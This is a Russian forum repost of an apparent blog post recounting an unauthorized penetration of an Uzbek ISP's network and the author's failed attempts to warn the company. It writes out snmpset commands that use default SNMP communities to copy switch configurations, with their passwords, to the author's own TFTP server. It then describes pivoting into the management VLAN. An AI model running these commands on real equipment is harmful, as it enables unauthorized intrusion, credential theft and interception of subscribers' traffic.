[Сетевые технологии, Сетевое оборудование] Пентест сети провайдера или почему не стоит доверять свои данные провайдерам в Узбекистане

Автор Сообщение
news_bot ®

Стаж: 6 лет 9 месяцев
Сообщений: 27286

Создавать темы news_bot ® написал(а)
26-Май-2021 20:30

ПредысторияБуквально несколько месяцев назад домашний интернет стал работать можно сказать ужасно, происходило это только по вечерам во время когда у провайдера нет людей которые могли бы выехать на место, письма, заявки и так далее не давали никаких результатов, говорят что специалист приедет днем, а что мне днем когда не работает вечером, так в один из дней я решил провести некоторые пентестерские изыскания в сети своего провайдера. Если вам стало интересно добро пожаловать под кат. PT0.1ENUMРешил начать сканирование с подсети 10.3X.X.0/24 т.к она светилась в трасерте несколько раз
насканив несколько свитчей с доступом по 80 порту решил проверить несколько других портов 161(SNMP) и 179(BGP) по итогу получил несколько свитчей с открытым SNMP и тут из всей пачки мне достался один с мисконфигом public и private не были удалены, что и сыграло мне на руку позжеPT1.1GathПолучив доступ по SNMP к одному из свитчей определился что свитч этот DGS-3620-28SC гигабитный Управляемый L3 стекируемый коммутатор с 20 портами SFP, 4 комбо-портами 100/1000Base-T/SFP и 4 портами 10GBase-X SFP+, используя private community решил слить себе бэкап конфига что мне и удалось используя snmpset
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.3.3 a $TFTP_SERVER_IPP
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.5.3 s $FILE_NAME.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.7.3 s config.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.8.3 i 2
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.12.3 i 3
покопав немного конфиг получаем пароль vfrtgb45switch(заменен в целях безопасности провайдера), а так же другое community string vfrtgb45switch и vfrtgb45switchrw теперь, пробежимся по остальным свитчам и добавим для удобства в последнюю виндовую версию The Dude, после этого мы увидим то что нам действительно нужно это MNGT vlan это 4002 с подсетью 172.2X.X.0/15
Потратил очень много времени на поиски места где же всё таки конфиг разрешает из сети юзера попасть в mngt vlan оказалось это еще несколько мисконфигов в некоторых свитчах, позже просканив еще несколько сетей я нашел свитч ARISTA-100G-CityPlace1 и его брата ARISTA-100GCityPlace2, в общем на данный момент у меня есть доступ к 50 L3 свитчам(до остальных в принципе он и не нужен), на которых спокойненько можно запустить TCPDUMP и собирать трафик всех наших прекрасных пользователей.PT2.1 Разговор с провайдером Спустя два месяца после получения первых доступов я добрался до ядра сети, но не стал делать всё плохо(хотя мог просто отключить консоль на всех свитчах, сменить community string и пароль), решил оформить все как надо, пообщаться с директором компании и объяснить ему что мисконфиги это плохо и надо проводить аудиты время от времени, но столкнулся с проблемой, связи с директором увы нет, админа которого мы нашли при помощи знакомых, откровенно сказал что это всё нае***ово и никто его сеть не сможет взломать. позже пошел в центральный офис, в пятницу, сказали что принимает только по вторникам, то есть ему пофиг как и админу, ок не стал торопить события, написал эту статью подготовился и пошел к нему во вторник, он меня не принял со словами завтра позвоню, в итоге на следующий день мне в лс постучался админ который так же котегорично сообщил что ему насрать на то что происходит, то есть компанииTuron Telecom абсолютно пофигу безопасность данных которые передают их пользователи. PT3.1 Для тех кто не смыслит в IT и будет читать этоДля обычного пользователя интернета данного провайдера это кажется не особо важным, но если вчитаться в это можно понять что в любой момент могут быть украдены Ваши логины и пароли от не зашифрованных служб например доступ к сайтам через HTTP, почту которую вы отправляете по SMTP, имея ваш IP адрес злоумышленник сможет видеть сайты которые вы посещали DNS, в общем полные доступы к вашим данным которые не имеют шифрования, это может стать очень пагубным для вас, я не один такой который сможет получить доступ к этой сети. так что люди думайте о своей безопасности!PT4.1 Ожидание реакции Сейчас дописал статью и в ожидании реакции или людей которые ее прочтут или реакции провайдера
===========
Источник:
habr.com
===========

Похожие новости: Теги для поиска: #_setevye_tehnologii (Сетевые технологии), #_setevoe_oborudovanie (Сетевое оборудование), #_isp, #_bezopasnost_dannyh (безопасность данных), #_uzbekistan (узбекистан), #_setevye_tehnologii (
Сетевые технологии
)
, #_setevoe_oborudovanie (
Сетевое оборудование
)
Профиль  ЛС 
Показать сообщения:     

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы

Текущее время: 22-Ноя 07:34
Часовой пояс: UTC + 5